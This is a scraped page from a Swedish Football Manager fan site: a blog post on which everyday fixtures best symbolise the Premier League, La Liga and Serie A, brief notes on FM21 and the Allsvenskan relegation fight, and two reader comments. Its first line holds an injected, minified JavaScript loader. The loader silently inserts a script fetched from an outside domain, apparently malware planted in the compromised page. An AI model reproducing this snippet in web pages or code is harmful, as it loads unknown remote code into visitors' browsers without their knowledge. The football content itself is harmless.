;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Mötet som beskriver en liga – FMSweden
Meny Stäng

Fabbes blogg: Mötet som beskriver en liga

En tanke som kom till mig när jag satt och tittade på Leeds-Wolverhampton under måndagskvällen var: Vilka är egentligen ”de perfekta mötena” i de stora ligorna?

Missförstå mig rätt nu, självklart finns det matcher som är större än vad denna matchen var i England. Det finns också matcher som är bra mycket mer intressantare ur flertalet perspektiv. Men när jag tidigare under dagen gick in i min app och kollade av dagens utbud och såg ”Leeds-Wolverhampton” stå där tänkte jag direkt: Det här är det ultimata Premier League-mötet för mig. Det är två klassiska lag som möts en regnig måndagskväll, och om någon skulle fråga mig: Vad är Premier League för dig?, hade jag utan att tveka kunnat svara Leeds-Wolverhampton.

Det förde tankarna till vilka möten i Spanien och Italien som man hade kunnat ta upp på samma sätt, vilket självklart också är lite kopplat till vilka som spelat i ligorna under ens uppväxt. I Spanien kom jag fram till att det ultimata mötet är Atlético de Madrid mot Villarreal. Två lag som förkroppsligar La Liga för mig. I Serie A föll valet på Bologna-Cagliari, mest på grund av att det känns som båda lagen spelat i Serie A under hela sin existens, trots att så inte är fallet.

Förstår ni vad jag är ute efter? Ett möte mellan två lag, inte naturligtvis två topplag, som symboliserar en liga för er. Möjligt att det här blir ett fiasko, och ingen bryr sig ett smack om vad jag skriver här. Men håller ni med mig om matcherna, eller han ni några motbud? Kommentera gärna.

——————————————

Snart dags för FM21 att släppas, och jag börjar känna av suget. Mitt första lag kommer att bli CSKA Moskva, och försöka bygga upp den unga truppen så att arméklubben får ta över Europa igen. Blir glad bara jag tänker tanken!

——————————————

Annars är det idel oväntade lag som har serieledningarna ute i de stora ligorna i Europa. Roligt – även om det naturligtvis inte kommer sluta så.

——————————————

I Sverige känns toppen avgjord som jag tidigare nämnt, och i botten sprattlade Falkenberg till. Att Kalmar åker ur känns väl tämligen givet, men det känns lite mer öppet kring andra nedflyttningsplatsen än vad det gjorde för någon vecka sedan. Hur många liv har Falkenberg? Hur många skador kan Helsingborg egentligen åka på? Och vad händer egentligen blev Blåvitt som inte alls såg bra ut mot AIK. Skaplig ångestmatch som väntar mellan IFK och Helsingborg i nästa omgång. Det är dags att ta tag i det nu herr Wernbloom – jag räknar med ett hattrick och att du tillägnar målen till mig i intervjun efter. Deal?

Allt väl vänner!

Ciao

Please wait...

Liknande Inlägg

3 kommentarer

  1. Micke

    Intressanta resonemang! För egen del så får jag utgå ifrån barndomen och vilka matcher man såg då, vilket mest var Milanoderbyt i Italien och El Clasico i Spanien (fruktansvärt tråkiga svar, jag vet). I England var det ju mycket matcherna mellan Manchester United och Liverpool, men även typ Bolton-Wigan känns ju som PL för mig. När det gäller Sverige så finns ju klassikermötet AIK-IFK Göteborg, men typ Kalmar-Örebro är ju en typisk allsvensk match också. Finns många roliga möten att välja emellan.

  2. trashbag

    Förstår vad du är ute efter och brukar resonera likadant när jag ska se någon match på tv från ligorna. Det är inte alltid toppmatcherna lockar mig då det oftast är topplagen man kan vara anti. Det är också så att man väcker någon slags skuggsympati med dessa klassiska lag som man förknippar med ligan. Antingen för ett nostalgiskt minne eller för att dom varit där uppe under sin livsperiod. Det kan också variera mellan ligorna. I Spanien har jag många lag och därav många klassiska/fina/ultimata möten då det är den ligan jag följt mest. Men även i Italien tycker jag många lag kan ingå i en “ultimat match”. Medan jag i tyska ligan är lite svagare. Det är svårt att ta några möten på uppstuds utan det är helt enkelt så att vissa matcher känns bättre i magen när man läser det kommande spelschemat för helgen. Hursomhelst måste jag säga att alla tre möten du nämner är mycket fina, speciellt svag för Bologna – Cagliari!

Lämna ett svar